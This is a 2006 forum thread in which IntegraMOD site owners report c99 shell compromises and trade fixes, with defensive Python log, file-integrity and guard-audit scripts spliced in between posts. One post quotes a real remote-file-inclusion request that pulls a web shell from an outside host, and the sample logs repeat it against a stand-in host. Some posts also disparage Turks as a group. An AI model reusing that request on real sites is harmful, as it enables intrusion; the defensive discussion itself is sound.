I was Hacked


PostAuthor: psyperu » Wed Aug 23, 2006 10:31 am

I can't access the Admin Panel.

It only shows this message:

Hacked By CyberLord FOR ISLAM

Any solution?

My site is http://www.vuelamaria.com/portal

PostAuthor: Bush » Wed Aug 23, 2006 5:17 pm

Reinstall

PostAuthor: suicico » Thu Aug 24, 2006 8:22 am

Just today I got hacked as well.
I wasn't able to load my site at all,
so I went to my latest visitors page and noticed that the visitor with the IP 172.151.112.178
was fooling around with functions.php.
To be more precise, here is an example:
/includes/functions_portal.php?phpbb_root_path=http%3A%2F%2Ftz4rr.webcindario.com%2Fc99shell.gif%3F&act=img&im
The other thing to get you suspicious is that this person came referred from Google with the search "Powered by integramod".
Well, this dude had deleted the content of portal.php, so the solution was to overwrite it, and all came back to normal.
Just pay attention now and then to your referrals.

Edit: the dude did the same to index.php.
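
The request quoted in the post above puts a remote URL into phpbb_root_path. As an added example (not part of the original post), this Python script scans combined-format access log lines for that pattern, including double-encoded values. The sample log lines, the example hosts and the PATH_PARAMS list are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Request portion of an Apache combined-format access log line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+'
    r'(?: "(?P<referer>[^"]*)")?'
)
# URL schemes that PHP stream wrappers can resolve inside include()/require().
REMOTE_RE = re.compile(r"^\s*(?:https?|ftps?|php|data|expect):", re.IGNORECASE)
# Parameters that should only ever hold a local relative path (assumed list;
# phpbb_root_path is the one seen in this thread).
PATH_PARAMS = {"phpbb_root_path"}

# Constructed sample lines: two remote-include attempts and two benign requests.
SAMPLE_LOG = [
    '203.0.113.7 - - [24/Aug/2006:08:01:12 +0000] "GET /includes/functions_portal.php'
    '?phpbb_root_path=http%3A%2F%2Fattacker.example%2Fshell.gif%3F&act=img HTTP/1.1" '
    '200 5120 "http://search.example/search?q=Powered+by+integramod" "Mozilla/4.0"',
    '198.51.100.20 - - [24/Aug/2006:08:02:40 +0000] "GET /viewtopic.php?t=1944 HTTP/1.1" '
    '200 20480 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [24/Aug/2006:08:03:05 +0000] "GET /includes/functions_portal.php'
    '?phpbb_root_path=hTTp%253A%252F%252Fattacker.example%252Fx.txt%253F HTTP/1.1" '
    '200 312 "-" "libwww-perl/5.805"',
    '198.51.100.21 - - [24/Aug/2006:08:04:00 +0000] "GET /portal.php?phpbb_root_path=./ '
    'HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]


def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding so %253A and %3A both end up as ':'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_remote_include_attempts(lines, path_params=PATH_PARAMS):
    """Return one record per request whose path parameter holds a remote URL."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        parts = urlsplit(m["target"])
        for name, raw in parse_qsl(parts.query, keep_blank_values=True):
            value = fully_decode(raw)
            if name.lower() in path_params and REMOTE_RE.match(value):
                hits.append({
                    "ip": m["ip"],
                    "time": m["time"],
                    "script": parts.path,
                    "param": name,
                    "value": value,
                    # 200 only means the script was served, not that the
                    # include succeeded; treat every hit as worth a file check.
                    "status": int(m["status"]),
                    "referer": m["referer"],
                })
    return hits


if __name__ == "__main__":
    for hit in find_remote_include_attempts(SAMPLE_LOG):
        print(hit["time"], hit["ip"], hit["script"], hit["value"], hit["status"])
```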


PostAuthor: InoculateIT » Thu Aug 24, 2006 10:53 am

Did you CHMOD the files?

CHMOD all files 644 except the ones mentioned in the integramod_install_guide_page1.htm

I have never been hacked

PostAuthor: suicico » Thu Aug 24, 2006 12:22 pm

Interesting advice (lol), silly me, you are right.
BTW, I just got hacked again, this time by a Turkish hacker called (nah, I would not give him credit for this), and again it was a silly exploit.
Anyhow, thx.

PostAuthor: Solomon » Thu Aug 24, 2006 2:38 pm

One of my sites was hacked today too.


I also found a file named c99.php in the backup folder. Contents are too long to post. I'd say this is more than just a coincidence this many Integramod sites were kiddie hacked today.
Last edited by Solomon on Thu Aug 24, 2006 6:13 pm, edited 1 time in total.

PostAuthor: honie » Thu Aug 24, 2006 3:17 pm

I got it today too... but my config file seems fine & I've restored the database & portal & index files & it's still there. Argh. Any ideas? I'm at http://www.policewives.org

PostAuthor: jwernerny » Thu Aug 24, 2006 3:44 pm

c99.php is a backdoor hacker script that is installed to writable directories. I had another version of it on my site a while back and it keeps trying to come in. It was called musa.php then.

Anyone want to share what hosting service their sites were on?

- John

PostAuthor: Solomon » Thu Aug 24, 2006 3:47 pm

"jwernerny";p="14006" wrote:c99.php is a backdoor hacker script that is installed to writable directories. I had another version of it on my site a while back and it keeps trying to come in. It was called musa.php then.

Anyone want to share what hosting service their sites were on?

- John

I just wiped out musa.php right before you posted. You're asking what hosting service; is this relevant for prevention? In other words, do some hosters block this backdoor script and others do not?

PostAuthor: honie » Thu Aug 24, 2006 4:03 pm

I've looked & I can't find either of those files; which directory would they be in?

BTW, my host is globat

PostAuthor: Solomon » Thu Aug 24, 2006 4:09 pm

"honie";p="14009" wrote:I've looked & I can't find either of those files; which directory would they be in?

BTW, my host is globat

I honestly already forget, but try forum/modules/cache/explain/

Also check /forum/includes/cache_tpls/

Look for files that were modified today that look fishy. Try comparing questionable files to previous complete backups or even stock Integramod files.

PostAuthor: odius » Thu Aug 24, 2006 4:10 pm

Yeah, I just restored my hacked site; just had to replace the config.php, and I think it was cookies.php which was givin the errors about the include files bein messed.. or maybe it was the way I did config.php.. did it twice.

Yeah, found bnc.txt in the backup folder.. I'm runnin integramod 1.4 with phpBB 2.0.19

My config WAS chmod 666, now it's 644, I think that's fine????

Is there an app like SFC.exe for WinXP (System File Checker) to check to see if there's any more crap they uploaded, and maybe somethin to check all the permissions too???
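
The two posts above ask for the same thing: Solomon suggests comparing files against a full backup or stock IntegraMOD files, and odius asks for a file checker that also covers permissions. As an added example (not part of the original posts), this Python script hashes a site tree against a known-good copy and lists added, modified and missing paths plus anything world-writable. The directory layout and file contents in demo() are constructed; on a real site the two arguments to compare() would be the web root and an unpacked stock package or clean backup.

```python
import hashlib
import os
import stat
import tempfile


def _digest(path):
    """SHA-256 of a regular file; symlinks are recorded by target, dirs as None."""
    if os.path.islink(path):
        return "symlink:" + os.readlink(path)
    if os.path.isdir(path):
        return None
    if not os.path.isfile(path):
        return "special-file"  # FIFO, socket or device: never expected in a web root
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(root):
    """Map every path under root (relative, '/'-separated) to (digest, mode)."""
    snap = {}
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            snap[rel] = (_digest(full), stat.S_IMODE(os.lstat(full).st_mode))
    return snap


def compare(site_root, baseline_root):
    """Report how the live tree differs from the known-good tree."""
    site, base = snapshot(site_root), snapshot(baseline_root)
    return {
        "added": sorted(p for p in site if p not in base),
        "missing": sorted(p for p in base if p not in site),
        "modified": sorted(p for p in site if p in base and site[p][0] != base[p][0]),
        # Symlinks always report mode 0777, so they are left out of this list.
        "world_writable": sorted(
            (p, oct(m)) for p, (d, m) in site.items()
            if m & stat.S_IWOTH and not (d or "").startswith("symlink:")
        ),
    }


def _write(root, rel, data, mode=0o644):
    full = os.path.join(root, rel)
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "wb") as fh:
        fh.write(data)
    os.chmod(full, mode)


def demo():
    """Build a constructed stock tree and a tampered copy, then compare them."""
    stock = {
        "index.php": b"<?php // stock index\n",
        "includes/functions_portal.php": b"<?php // stock portal functions\n",
        "includes/cache_tpls/.htaccess": b"deny from all\n",
    }
    with tempfile.TemporaryDirectory() as tmp:
        base, site = os.path.join(tmp, "stock"), os.path.join(tmp, "site")
        for root in (base, site):
            for rel, data in stock.items():
                _write(root, rel, data)
        for dirpath, dirnames, _ in os.walk(site):
            for d in dirnames:
                os.chmod(os.path.join(dirpath, d), 0o755)
        # Constructed tampering: overwritten index, dropped file, loose modes.
        _write(site, "index.php", b"defaced\n", mode=0o666)
        _write(site, "includes/cache_tpls/musa.php", b"<?php /* placeholder */\n")
        os.chmod(os.path.join(site, "includes/cache_tpls"), 0o777)
        return compare(site, base)


if __name__ == "__main__":
    for key, paths in demo().items():
        print(key, paths)
```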

PostAuthor: honie » Thu Aug 24, 2006 4:47 pm

K, I checked there too & nothing weird. I am stumped I have no clue what to do next.

PostAuthor: Solomon » Thu Aug 24, 2006 4:50 pm

"suicico";p="13995" wrote:Just today I got hacked as well.
I wasn't able to load my site at all,
so I went to my latest visitors page and noticed that the visitor with the IP 172.151.112.178
was fooling around with functions.php.
To be more precise, here is an example:
/includes/functions_portal.php?phpbb_root_path=http%3A%2F%2Ftz4rr.webcindario.com%2Fc99shell.gif%3F&act=img&im
The other thing to get you suspicious is that this person came referred from Google with the search "Powered by integramod".
Well, this dude had deleted the content of portal.php, so the solution was to overwrite it, and all came back to normal.
Just pay attention now and then to your referrals.

Edit: the dude did the same to index.php.


Yup, my referrals list shows:

Referrer Host: http://www.google.com.tr
Referrer URL: http://www.google.com.tr/search?q=Power ... rt=40&sa=N
Referrer IP: 85.102.183.32

Blocking http://www.google.com.tr & http://www.google.com.ru in the ACP/Security/Special/Block Referrers section wouldn't be a bad idea.

PostAuthor: odius » Thu Aug 24, 2006 5:06 pm

What versions are u guys runnin? Are u not updated like me or what? Let's fix this lol

PostAuthor: Solomon » Thu Aug 24, 2006 5:35 pm

"odius";p="14015" wrote:What versions are u guys runnin? Are u not updated like me or what? Let's fix this lol

Revealing this can actually compromise a site's security, because exploits are often version-specific.

PostAuthor: honie » Thu Aug 24, 2006 6:17 pm

No, I did all the updates and still got it

PostAuthor: suicico » Thu Aug 24, 2006 8:09 pm

Yeah.. I wasn't updated.. indeed..
But the main problem must have been in the chmod of functions_portal.php, 'cause that's the one the 1st kiddie was attempting to hack.
In one of my files there was an IRC channel, and I visited this channel, and in the topic of the channel was the command used in the URL, so here is your reason why that many integramod sites were exploited today. I would expect more to come.
In any case, now I'm on 2.2.1 and with the 'right' chmod I believe the site is safe from this exploit.
In any case, the good news is that they only mess with the PHP part and not the MySQL.

PostAuthor: Solomon » Thu Aug 24, 2006 8:28 pm

"suicico";p="14021" wrote:Yeah.. I wasn't updated.. indeed..
But the main problem must have been in the chmod of functions_portal.php, 'cause that's the one the 1st kiddie was attempting to hack.
In one of my files there was an IRC channel, and I visited this channel, and in the topic of the channel was the command used in the URL, so here is your reason why that many integramod sites were exploited today. I would expect more to come.
In any case, now I'm on 2.2.1 and with the 'right' chmod I believe the site is safe from this exploit.
In any case, the good news is that they only mess with the PHP part and not the MySQL.

Silly Turks!

PostAuthor: suicico » Thu Aug 24, 2006 8:33 pm

I wouldn't judge the Turks as silly.. BUT
when I tried to log in to my site yesterday and I saw something like
Im a turkish hacker
i fuck greece ..
I thought that yeah.. some Turkish are braindead.

PostAuthor: ZacFields » Thu Aug 24, 2006 9:57 pm

Well I have not been hacked and thanks to your posts I am making a database backup as we speak, but if you guys are looking for terms on your site that you can remove to prevent being targeted by searches like this, here are a few that I can think of:

-powered by phpbb
-powered by integramod <--- You definitely should change the layout of this in your footer in some way to keep it off those searches. I actually have this one in my referrals right now...but I was not hacked today to my knowledge.
-powered by knowledge base (I keep getting this one...every month)


A good way to prevent hackers is to create your own alteration of the information given in the footer of your site.

I'm digging through my logs right now to see if I have anything to worry about. I also have an extra password setup on my admin panel too which could help (just a popup pass) but looks to me like the hacker didn't go into you guys' admin panels right?

Zac

PostAuthor: suicico » Thu Aug 24, 2006 10:39 pm

No, they didn't. The most harm they did was to rewrite the config.php,
nothing to do with MySQL.
About Powered by knowledge base..
Yeah, I have noticed it in my referrals as well, but I think the security gets it.
And as for the footer, well, I always want to keep the copyrights; that's why I never mess with them.
But to alter them, hmm.
Something like Powered by integra-mod <<< ?
Would that keep me off the search results?
And if yes.. is it OK with Integra?
Anyhow, it is a nice idea.

PostAuthor: jwernerny » Fri Aug 25, 2006 5:51 am

"Solomon";p="14007" wrote:I just wiped out musa.php right before you posted. You're asking what hosting service; is this relevant for prevention? In other words, do some hosters block this backdoor script and others do not?


I did some research on musa.php when it first appeared on my site a couple of months ago. If you run the code (it is an interesting app to play with), one of the options it gives is to install a copy of itself into any writable directory you choose. One of the popular ways it is installed is to randomly target writable directories and try to put copies in there. This can only happen on a single machine (or a machine with NFS access to another machine). Once a single user on a shared machine is compromised, it is very easy for other users to be compromised.

The reason the host is important is it can help alert other people who might have the same host to watch out for it.

If you find it on your site, you should alert your hosting service so they can check for it in other places.

BTW, some hosting services also have online virus checking for their hosted files. The virus checking does pick this up. I try to run it once every couple of days as a precaution.

I also suggested that the next security_mod look for extra files in known writable directories, but the author of that mod was not sure if he could get it implemented.

- John

PostAuthor: odius » Fri Aug 25, 2006 11:39 am

Anyone wanna holla the proper chmod settings??
Also found this "includes/cache_tpls/musa.php" (158kb) with a few other files I'm lookin through..

zh.php,
eLHacKeR1 12 k,
SendTo.php 8 k 0644
httpd 11 k is bullshit too

index.php 5 k 0644 and mailer.php are both the same file in that folder too. foot.php & head.php are part of the mailer too.

I think that's all in that folder.. deleted 'em all

What should the chmod for that folder be.. it was 777

PostAuthor: Solomon » Fri Aug 25, 2006 1:00 pm

2nd time hacked in less than 24hrs.
Little e-peen Team was here !
Fatal error: Call to undefined function: phpbbsecurity_blocks() in /home/xxxxxxx/public_html/forum/common.php on line 392


My phpbb_security.php file contents were deleted and replaced with "Little e-peen Team was here !". This file was set to CHMOD: 666

phpbb 1.0.3 and/or phpBB 2.0.21 have a hole in it?
CHMOD settings are all intact.
Never had a problem until I did the integraMOD 2.0.21 update.

Future prevention suggestions?

PostAuthor: suicico » Fri Aug 25, 2006 2:33 pm

After being hacked more than 5 times in something more than 24 hours, I deleted some (many) files that looked suspicious. My files were at public_html/files/.sec/ (many files in here).
Anyhow, since my site isn't international, I have banned a range of IPs from Turkey (since those were the ones that hacked me a lot) and banned all users that use proxies.
If you know how, just PM me.
Since the bans.. all good for me.
PS. I don't think it has to do with 2.0.21 or with 1.0.3, since I had 1.0.2 and 2.0.19 when this started.
A little note is that they were looking for Integra, meaning that the hole is in Integra and not in phpBB; also, the file that they usually attack is functions_portal.php, which is Integra's file.

PostAuthor: Unregistered » Fri Aug 25, 2006 2:33 pm

Hmm, interesting conversation..
Anyways, just thought of dropping some hints on how to prevent hacking attempts...

I've changed my admin/ dir to something else.. therefore I'm the only one who knows how to get into the admin panel.. e.g. http://www.domain.com/secret-dir
and created a dummy admin folder and put a directory password on it..

Another thing is, I've deleted all database-related files from my admin panel.. even if anyone executes a cmd to remove the DB via the admin panel, it won't work..

And keep ur security settings at the maximum level..

And I've tested version 141.. it has an additional security feature, which gives a hacker a harder and harder time to attack..

PostAuthor: Unregistered » Fri Aug 25, 2006 2:45 pm

One more thing.. the backup folder you guys are talking abt... well, put a password on that folder as well..

PostAuthor: suicico » Fri Aug 25, 2006 3:04 pm

Also, I don't know if this helps, but doing a search on Google about functions_portal.php I came to this:
http://www.integramod.com/forum/viewtop ... e0e7bfb752
This sounds like a solution, I think.

PostAuthor: Solomon » Fri Aug 25, 2006 3:08 pm

"Unregistered";p="14069" wrote:One more thing.. the backup folder you guys are talking abt... well, put a password on that folder as well..

First hack they used the "backup", "modules", & "/includes/cache_tpls" folders (all CHMOD: 777) to upload their files; second time hacked they used the "files" folder (CHMOD: 777) to upload their files, since I deleted the "backup" folder because I don't use the IntegraMOD backup utility.

"suicico";p="14070" wrote:Also, I don't know if this helps, but doing a search on Google about functions_portal.php I came to this:
http://www.integramod.com/forum/viewtop ... e0e7bfb752
This sounds like a solution, I think.

I was just looking at that file and wondering why that code was missing.

The IntegraMod_2020_to_2021.txt instructions say:
Code:
#-----[ OPEN ]---------------------------------------------
#
includes/functions_portal.php

#
#-----[ FIND ]---------------------------------------------
# Line 22
include_once($phpbb_root_path . 'includes/lite.'.$phpEx);

#
#-----[ BEFORE, ADD ]---------------------------------------------
#
if ( !defined('IN_PHPBB') )
{
     die('Hacking attempt');
     exit;
}


But the pre-modded file included in the update package does not have this code and is dated: Monday, August 08, 2005, 11:27:08 AM.

PostAuthor: ihammo » Fri Aug 25, 2006 7:02 pm

Does anyone know yet exactly where/how this exploit starts? Is it the missing code in functions_portal.php?

I want to make sure that before I bring stuff back up it really is fixed.

As it is, my provider has shut my site down, as they had uploaded several trojans and were using my server as a point to launch other attacks.

backdoors to look for are:

Ronin
dc
bindtty

tomorrow is going to be a long day

PostAuthor: ihammo » Fri Aug 25, 2006 7:10 pm

Further to that - I noticed other function_xxxxx files in the includes folder also don't have the code below at the top. Can anyone say if they should have or not??

if (!defined('IN_PHPBB'))
{
    die('Hacking attempt');
}
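
The IN_PHPBB check quoted in the two posts above stops an include file from running when it is requested directly instead of being loaded by a phpBB entry script. As an added example (not part of the original posts and not IntegraMOD code), this Python script classifies PHP sources by whether that check appears before the first include that uses $phpbb_root_path. The status names and the sample sources are constructed for the example, and the comment stripping is deliberately rough.

```python
import os
import re

# Rough comment stripper: block comments and whole-line // or # comments, so a
# commented-out guard is not counted as a guard.
COMMENT_RE = re.compile(r"/\*.*?\*/|^[ \t]*(?://|#).*?$", re.S | re.M)
# The guard: defined('IN_PHPBB'), as used in "if (!defined('IN_PHPBB')) die(...)".
GUARD_RE = re.compile(r"""defined\s*\(\s*['"]IN_PHPBB['"]\s*\)""")
# Entry scripts (index.php and friends) set the constant themselves.
ENTRY_RE = re.compile(r"""\bdefine\s*\(\s*['"]IN_PHPBB['"]""")
# An include/require statement whose path is built from $phpbb_root_path.
INCLUDE_RE = re.compile(r"\b(?:include|require)(?:_once)?\b[^;]*?\$phpbb_root_path")


def classify(source):
    """Return 'entry-point', 'unguarded-include', 'guarded' or 'no-guard'."""
    code = COMMENT_RE.sub("", source)
    if ENTRY_RE.search(code):
        return "entry-point"
    guard = GUARD_RE.search(code)
    include = INCLUDE_RE.search(code)
    # Dangerous case: the include is reachable before any guard has run.
    if include and (guard is None or guard.start() > include.start()):
        return "unguarded-include"
    return "guarded" if guard else "no-guard"


def audit_tree(root):
    """Classify every .php file under root; keys are '/'-separated relative paths."""
    results = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if name.lower().endswith(".php"):
                full = os.path.join(dirpath, name)
                with open(full, encoding="utf-8", errors="replace") as fh:
                    rel = os.path.relpath(full, root).replace(os.sep, "/")
                    results[rel] = classify(fh.read())
    return results


# Constructed sample sources; file names other than functions_portal.php and
# index.php are hypothetical.
SAMPLES = {
    "includes/functions_portal.php":
        "<?php\ninclude_once($phpbb_root_path . 'includes/lite.'.$phpEx);\n",
    "includes/functions_fixed.php":
        "<?php\nif ( !defined('IN_PHPBB') )\n{\n\tdie('Hacking attempt');\n}\n"
        "include_once($phpbb_root_path . 'includes/lite.'.$phpEx);\n",
    "includes/functions_late.php":
        "<?php\nrequire($phpbb_root_path . 'includes/x.'.$phpEx);\n"
        "if (!defined('IN_PHPBB')) { die('Hacking attempt'); }\n",
    "includes/functions_commented.php":
        "<?php\n// if (!defined('IN_PHPBB')) die('Hacking attempt');\n"
        "include($phpbb_root_path . 'includes/y.'.$phpEx);\n",
    "includes/constants.php":
        "<?php\ndefine('PAGE_INDEX', 0);\n",
    "index.php":
        "<?php\ndefine('IN_PHPBB', true);\n$phpbb_root_path = './';\n"
        "include($phpbb_root_path . 'common.php');\n",
}


def demo():
    return {name: classify(src) for name, src in SAMPLES.items()}


if __name__ == "__main__":
    for name, status in sorted(demo().items()):
        print(f"{status:18} {name}")
```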


PostAuthor: MercAngel » Fri Aug 25, 2006 8:50 pm

Just found out a site I am an admin on was also hacked,

but the other site I own was not, and there are links back to mine on the one that was hacked, so maybe it is a host thing.

PostAuthor: Unregistered » Sat Aug 26, 2006 6:13 am

Were all the sites which used premodded files hacked? Or did u guys update manually by using FIND / REPLACE codes?

PostAuthor: Driver 7 » Sat Aug 26, 2006 7:22 am

Bloody hell. I was hacked also.

PostAuthor: Drop-Forged » Sat Aug 26, 2006 7:29 am

"Unregistered";p="14109" wrote:Were all the sites which used premodded files hacked? Or did u guys update manually by using FIND / REPLACE codes?


I used premodded files on my site, and yes, was hacked...

PostAuthor: ZacFields » Sat Aug 26, 2006 8:29 am

ihammo,

yes that string of code is supposed to be there for security purposes.

Zac

PostAuthor: Rabi » Sat Aug 26, 2006 8:39 am

I was hacked also....

PostAuthor: Solomon » Sat Aug 26, 2006 11:33 am

Make that 3x hacked in less than 48 hours. See this thread if you haven't already: http://integramod.com/forum/viewtopic.php?t=1944

PostAuthor: Driver 7 » Sat Aug 26, 2006 11:43 am

It's an automated hacking script as far as I can tell.

It looks to me like the place of entry was through somewhere inside the chatspot folder.

PostAuthor: Teelk » Sat Aug 26, 2006 1:43 pm

Chatspot 1.0.0 is installed with IM, while version 2.0.0a7 is the latest version. I'll make the update available as soon as I have it all put together.

PostAuthor: Driver 7 » Sat Aug 26, 2006 1:55 pm

Thanks Teelk.

What is chatspot and what exactly does it do? Is it something we use or can it be removed?

PostAuthor: MercAngel » Sat Aug 26, 2006 2:49 pm

Are we sure they are getting in through the forum software itself and not the host or some other way?

I have had my other site open now for 48 hours. I CHMODed all the files and folders to 777 so it could be hacked easily.

I also have a packet sniffer running, and so far nothing.

PostAuthor: MercAngel » Sat Aug 26, 2006 3:19 pm

I have been checking the internet on this file called c99.php.

I have found sites that have been hacked by this thing back to 2004.

It looks like they have hacked just about every forum software there is, as well as some non-forum sites.

PostAuthor: Solomon » Sat Aug 26, 2006 4:02 pm

How come this site hasn't been hacked yet? What are they doing right, that we are all doing wrong?

PostAuthor: ErikG » Sat Aug 26, 2006 4:22 pm

Could it be that it is simply written "down below". As they seem to search via google or some such and look for powered by integramod etc, but here it says powered by kismod.

Could it be so simple?

PostAuthor: Solomon » Sat Aug 26, 2006 4:31 pm

"ErikG";p="14161" wrote:Could it be that it is simply written "down below". As they seem to search via google or some such and look for powered by integramod etc, but here it says powered by kismod.

Could it be so simple?

My latest referrer was http://www.alltheweb.com and the search text was "Powered by KisMod © 2004, 2006 The Integramod Group".

I see the only difference here is 2001, 2006, but mine doesn't say KisMod, it said IntegraMOD, so it was found anyways. They use the search engines to find forums to victimize, but I'm sure they know the main URL here as well. So no, it can't be that simple. I would think they would target this site first, then the rest of the sites. It would sure suck if we couldn't get help here because it was down. *knock-on-wood*

You can block referrers in the ACP, or a better method is to block them in the ".htaccess" file. Information on how can be found here: http://www.javascriptkit.com/howto/htaccess14.shtml

PostAuthor: evolver » Sat Aug 26, 2006 5:25 pm

Euhm, how many of these hacked sites have a link on integraMOD2.com...
...or maybe even still on integraMOD.com ??

No need for Google to find these...
No need for 'Powered by' keywords to find these...

There are easier ways to find integraMOD sites than just by using Google...
And of course, that could also be a very good reason why integraMOD.com hasn't been hacked yet...

Just don't focus at one direction only...
Think about every possibility, because that's how hackers think as well...

PostAuthor: joescamera » Sun Aug 27, 2006 1:33 pm

Hello - I was also hacked on the 24 and again the 25th (after I'd successfully got my site back and running by replacing the config.php file)

Unfortunately, when "they" hacked me on the 25th, EVERY file and folder was deleted from my host's server. (this was Saturday and have been siteless since).

I received an email from my host this evening after constant chasing, which may or may not help the current issue:


Thank you for contacting us.

Searching your access logs it seems your site was hacked on the 24th
(and again today). I will restore a backup from the night of the 23rd
which should contain everything you are missing. I recommend updating
your phpbb forum to the newest version because it seems that is how they
got in. If you look in your logs folder at the access.log.34.4.gz file
you will see they posted a pomponk.txt file which is actually a php
script used to hack your space. The IP it comes from is 202.138.226.3
which is an Indonesian ip, which has a high rate for these things. I
will let you know as soon as the back is restored.


Obviously I don't want to just start using the software again as is, but am pretty new to "locking down" software etc - can anyone recommend some sensible precautions to make that will enable me to continue using my site for visitors to upload and post, without too much risk to my site / server?

Many thanks.

joescamera
Newbie
Newbie
 
Posts: 1
Likes: 0 post
Liked in: 0 post
Joined: Mon Mar 27, 2006 3:16 pm
Cash on hand: 0.00

PostAuthor: Unregistered » Sun Aug 27, 2006 2:02 pm

J O N H | P L A Y E R

Unregistered
Sr Integra Member
Sr Integra Member
 
Posts: 254
Likes: 0 post
Liked in: 0 post
Joined: Wed Jun 07, 2006 2:51 pm
Cash on hand: 0.00

Re: I was Hacked

PostAuthor: jwernerny » Sun Aug 27, 2006 3:25 pm

I'm pretty sure these hacks are actually cross contaminations from a master server. The quick and simple way to prevent them may be to obfuscate (hide) the forum source directories and use .htaccess to make it look like things are in the expected location.

I'll explain. Let's say I am a hacker and I have compromised a website with the c99 shell script. If I know that IM1.4.0 is normally installed in "forum" and has open directories of "files," etc., and I am on a host that seems to assign user names in a regular fashion, then I can quickly infect other sites by trying to blindly write into the directories.

For instance, let's say on host "ABC_XYZZY_Hosting.com", I have now found that users are given IDs in the form of "user0001", "user0002", "user0003", etc., then I can start randomly trying to write to /home/user0001/forum/files, then /home/user0002/forum/files, etc.

BTW, I got hacked this morning. I found 2 copies of c99 shell, one in files and the other someplace else. I am on WB-Hosting. If you use WB-Hosting, I strongly suggest you check things out and take some steps to make sure the well known directories are not accessible.

- John
jwernerny
Members
Members
 
Posts: 87
Likes: 0 post
Liked in: 0 post
Joined: Wed Apr 12, 2006 4:58 am
Cash on hand: 0.00
Location: Fairport, NY

PostAuthor: jwernerny » Sun Aug 27, 2006 3:35 pm

PS: Once you are hacked, I would suggest creating a new database user name with a new password.
jwernerny
Members
Members
 
Posts: 87
Likes: 0 post
Liked in: 0 post
Joined: Wed Apr 12, 2006 4:58 am
Cash on hand: 0.00
Location: Fairport, NY

Cross contaminations from a master server!

PostAuthor: Michaelo » Sun Aug 27, 2006 4:38 pm

Cross contaminations from a master server!

This is definitely happening, I have come across it earlier today... If someone hacks a site they can, by the use of the c99 shell script (and other scripts), as explained by jwernerny above, screw up any other phpBB/IntegraMod based site on the same server...

It is up to us to be vigilant; therefore it is necessary to check your site for any file that should not be there. Note some of these files may have a php extension; if in doubt about a file, check your original upload source.

Mike
Kiss Portal Engine phpbbireland (status: Released)
Michaelo
Administrator
Administrator
 
Posts: 1647
Likes: 0 post
Liked in: 2 posts
Joined: Sat Mar 11, 2006 6:14 pm
Cash on hand: 5.10
Location: Dublin, Ireland

Re: I was Hacked

PostAuthor: jwernerny » Sun Aug 27, 2006 5:08 pm

Okay, I have just looked at my raw logs. My hacker definitely came through the functions.php exploit, not cross contamination. Still, I would be wary.

- John
jwernerny
Members
Members
 
Posts: 87
Likes: 0 post
Liked in: 0 post
Joined: Wed Apr 12, 2006 4:58 am
Cash on hand: 0.00
Location: Fairport, NY
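
A way to run the raw-log check described in the post above, added here as an example that is not part of the thread or of IntegraMOD. It flags any request whose query parameter decodes to a remote URL, the pattern of the `phpbb_root_path` request quoted earlier; the log format (Apache common/combined), the sample lines and all function names are assumptions.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Apache common/combined log format: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
# A parameter value that is itself a URL, as in the phpbb_root_path request.
REMOTE_RE = re.compile(r"^\s*(?:https?|ftp)://", re.IGNORECASE)

# Constructed sample lines (documentation IP ranges, reserved .example host).
SAMPLE_LOG = [
    '192.0.2.10 - - [24/Aug/2006:08:01:12 +0000] "GET /portal/index.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [24/Aug/2006:08:02:40 +0000] "GET /portal/includes/functions_portal.php?phpbb_root_path=http%3A%2F%2Fhost.example%2Ffile.gif%3F&act=img HTTP/1.1" 200 312',
    '198.51.100.7 - - [24/Aug/2006:08:09:03 +0000] "GET /forum/includes/functions_portal.php?phpbb_root_path=http%3A%2F%2Fhost.example%2Ffile.gif%3F HTTP/1.1" 404 210',
    '203.0.113.5 - - [24/Aug/2006:08:10:44 +0000] "GET /portal/search.php?keywords=http+headers HTTP/1.1" 200 2048',
]

def find_remote_includes(lines):
    """Return one finding per query parameter whose decoded value is a remote URL."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        target = urlsplit(m["target"])
        # parse_qsl percent-decodes, so %3A%2F%2F is compared as ://
        for name, value in parse_qsl(target.query, keep_blank_values=True):
            if REMOTE_RE.match(value):
                findings.append({
                    "ip": m["ip"], "time": m["ts"], "script": target.path,
                    "param": name, "value": value,
                    # 2xx: the server answered the request, so treat the
                    # site as possibly compromised; 4xx: it was refused.
                    "served": m["status"].startswith("2"),
                })
    return findings

if __name__ == "__main__":
    for f in find_remote_includes(SAMPLE_LOG):
        state = "SERVED" if f["served"] else "refused"
        print(f'{f["time"]} {f["ip"]} {f["script"]} {f["param"]}={f["value"]} [{state}]')
```

Parameters that legitimately carry a URL will match as well, so review the hits by script and parameter name.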

PostAuthor: gcomfx.com » Sun Aug 27, 2006 6:45 pm

My host shut me down.

my integramod forum was spamming.

includes folder was sending out 4540 emails.

UGH.... I'm trying to get my host to let me put up an announcement page and leave everything else off until a solution is found for all of this.
Paul (gcomfx) - 100mphclub.com originator
gcomfx.com
Sr Integra Member
Sr Integra Member
 
Posts: 251
Likes: 0 post
Liked in: 0 post
Joined: Wed Apr 12, 2006 9:34 am
Cash on hand: 0.00

PostAuthor: gcomfx.com » Mon Aug 28, 2006 9:53 pm

Okay guys, I basically killed my cpanel account and started all over. I have yet to upload integramod.

